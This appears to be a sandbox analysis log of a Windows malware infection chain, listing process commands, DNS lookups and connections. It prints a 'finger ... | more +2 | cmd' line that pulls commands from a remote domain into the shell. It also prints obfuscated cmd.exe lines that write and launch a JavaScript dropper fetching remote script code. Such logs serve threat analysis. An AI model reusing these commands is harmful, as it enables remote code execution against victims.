Technical Information
- '<SYSTEM32>\finger.exe' ok@etaasg.doctosdigitalizados.date
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Videos\gHh.js"
- C:\users\public\videos\ghh.js
- 'et####.##ctosdigitalizados.date':79
- 'et####.#d26m8g1ailu.casa':80
- 'et####.##ctosdigitalizados.date':79
- DNS ASK et####.##ctosdigitalizados.date
- DNS ASK et####.#d26m8g1ailu.casa
- '<SYSTEM32>\cmd.exe' /c finger ok@etaasg.doctosdigitalizados.date |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt TYWI=.j&&SEt PKEVN=vLwcfarLwcf a =Lwcf 'scLwcfriLwcfptLwcf:'; b =Lwcf 'hLwcfTtPLwcf:'; GLwcfetLwcfObjLwcfecLwcft(Lwcfa+b+'&&sET OPE7=YBPBEYBPBEetaa0h.sd26m8g1ailu.casaYBPBE?1YBPBE')...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p JXCCZ="%PKEVN:Lwcf=%%OPE7:YBPBE=/%" 0<nul 1>C:\Users\Public\Videos\gHh%TYWI%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\Videos\gHh%TYWI%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\Videos\gHh.js